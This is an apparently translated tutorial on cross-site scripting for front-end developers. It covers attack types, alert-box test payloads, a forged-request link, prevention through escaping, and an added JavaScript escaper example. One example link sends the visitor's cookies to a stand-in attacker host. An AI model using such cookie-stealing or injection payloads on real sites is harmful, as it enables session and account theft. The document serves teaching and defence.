Front-end XSS attacks

Source: Internet
Author: User

What is XSS?

XSS (cross-site scripting) is a security vulnerability that often appears in web applications. An attacker inserts malicious HTML or script code into a web page; when a user browses to that page, the embedded code is executed in the user's browser, and the attacker achieves whatever that script was written to do.
XSS is a passive attack: the victim has to load the page or click the link. Because it is passive and awkward to exploit, many people ignore how harmful it is, but with the development of front-end technology the problem is getting more and more attention. A simple example: suppose you are a user of an SNS site and the feature for publishing updates has a vulnerability that lets entered JavaScript execute. If you enter a malicious script such as alert(), everyone who views your update in a browser will execute that script and see the pop-up. That is child's play; a more aggressive payload would have far more serious consequences.
Someone has summarised this attack process in a diagram that makes it easier to understand.

The harm of XSS attack

The hazards of XSS attacks include:

    • Stealing all kinds of user accounts, such as machine login accounts, online banking accounts and administrator accounts of every kind

    • Controlling enterprise data, including the ability to read, tamper with, add and delete sensitive enterprise data

    • Theft of information with important business value

    • Illegal transfer of funds

    • Forcing the victim to send e-mail

    • Planting malware on the website ("trojan hanging")

    • Controlling the victim's machine to launch attacks on other websites
      Example (typical test payloads, each of which only pops an alert box):

<body background="javascript:alert('XSS webjiaocheng!')">
<iframe src="javascript:alert('XSS webjiaocheng!')">
<body onload="a();">
<script>function a() { alert('XSS webjiaocheng!'); }</script>
</body>
Types of XSS attacks
    • Attacks from other sites against the application site: as the name says, this attack is initiated externally, from an e-mail or another site. When the user clicks a link, downloads a picture or submits a form, an operation the attacker intended is carried out against the application website.
      Usually the user is already logged in and has a usable session; the XSS attacker can take advantage of this session, bypassing user authentication and performing some unsafe operation, as follows:

<a href="http://www.2cto.com/addComment.php?subject=I am owned">Check it out!</a>

With such a link, as soon as a logged-in user clicks it a comment with that subject is posted, even though the link sits on another website.
This is why an ordinary mail client does not automatically load pictures from untrusted sites (the SRC attribute of an img tag can send a GET request to a third-party site), and why the session should be set to expire automatically.

    • Attacks from the application site against the same site or other sites: this attack usually works by commenting on the application site, or otherwise embedding code, so that when a user loads the page or clicks a link, actions other than the intended ones are produced.
      As follows:

<a href="#" onmouseover="window.location='http://reallybadguys.net/collectCookie.php?cookie=' + escape(document.cookie);">Check it out!</a>

When the user's mouse passes over the link, the cookie information is sent to the attacker's server.

The information above is also summarised, in a different way, as the following types:

    • A locally exploited vulnerability that exists in the client-side script of the page itself.
      The attack process is as follows:
      A sends B a maliciously constructed web URL. B clicks on and views this URL.
      JavaScript in the malicious page opens a vulnerable HTML page and installs it on B's computer. The vulnerable HTML page contains JavaScript that executes in the local domain of B's computer.
      A's malicious script can then execute commands on B's computer with the permissions B holds.

    • Reflection vulnerability
      This vulnerability is somewhat similar to the type above, except that it arises when the web client uses a server-side script to generate the page served to the user: if unvalidated user data is included in the dynamic page without HTML-entity encoding, client-side code can be injected into that page.

Prevention

As front-end developers we need to make our code as robust and complete as we can. As development experience grows, I believe understanding of anti-XSS techniques in the areas we know well will keep deepening; the following covers only a few aspects, and you can continue to expand on this part.

    • For data such as names and descriptions, pay extra attention to where the data comes from, and during self-testing enter XSS exception data such as:

></script><iframe/onload=alert(2)>

Such XSS probe strings make it easier to discover potential vulnerabilities.

    • When using the innerHTML method in JS to modify the DOM, escape the data first.

    • When using a template language such as FreeMarker, the entry file can be wrapped in the

<#escape x as x?html> ... </#escape>

directive, which ensures that template data output between the directives is escaped by default. In some specific cases it is not convenient to use the <#escape> directive; there the individual output can be escaped instead, for example ${name?html}, where the ?html built-in is FTL's escape instruction.
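As an added example (not code from the original article), the innerHTML bullet above in working form: a small HTML escaper and a vulnerable renderer beside its hardened form, checked against the article's probe string. The renderCommentUnsafe/renderCommentSafe names and the activeTagsIn heuristic are assumptions of this example.

```javascript
// Added example, not from the original article: an HTML escaper for data that
// a page inserts via innerHTML, checked against the probe string the article
// suggests typing into name/description fields during self-testing.

// The five characters that can break out of an HTML text or attribute context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape untrusted text so it renders literally when assigned to innerHTML.
// (If no markup is needed at all, element.textContent is simpler and safer.)
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: user-supplied fields concatenated straight into markup.
function renderCommentUnsafe(name, body) {
  return `<div class="comment"><b>${name}</b>: ${body}</div>`;
}

// Hardened form: every untrusted field is escaped before the markup is built.
function renderCommentSafe(name, body) {
  return `<div class="comment"><b>${escapeHtml(name)}</b>: ${escapeHtml(body)}</div>`;
}

// Self-test heuristic: list any script-capable tags that survived rendering.
// Only a raw "<" starts a tag, so the escaped "&lt;" never matches.
function activeTagsIn(html) {
  const found = [];
  const re = /<\/?(script|iframe|img|svg)\b/gi;
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1].toLowerCase());
  return found;
}

// Constructed probe with the same shape as the article's test string.
const PROBE = "></script><iframe/onload=alert(2)>";

// Usage: the unsafe renderer lets the tags through, the safe one neutralises them.
console.log(activeTagsIn(renderCommentUnsafe(PROBE, "hello"))); // ["script", "iframe"]
console.log(activeTagsIn(renderCommentSafe(PROBE, "hello")));   // []
```

The same escaper belongs in front of any string that ends up in innerHTML, including values that came from your own API, since stored XSS arrives through exactly that path.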
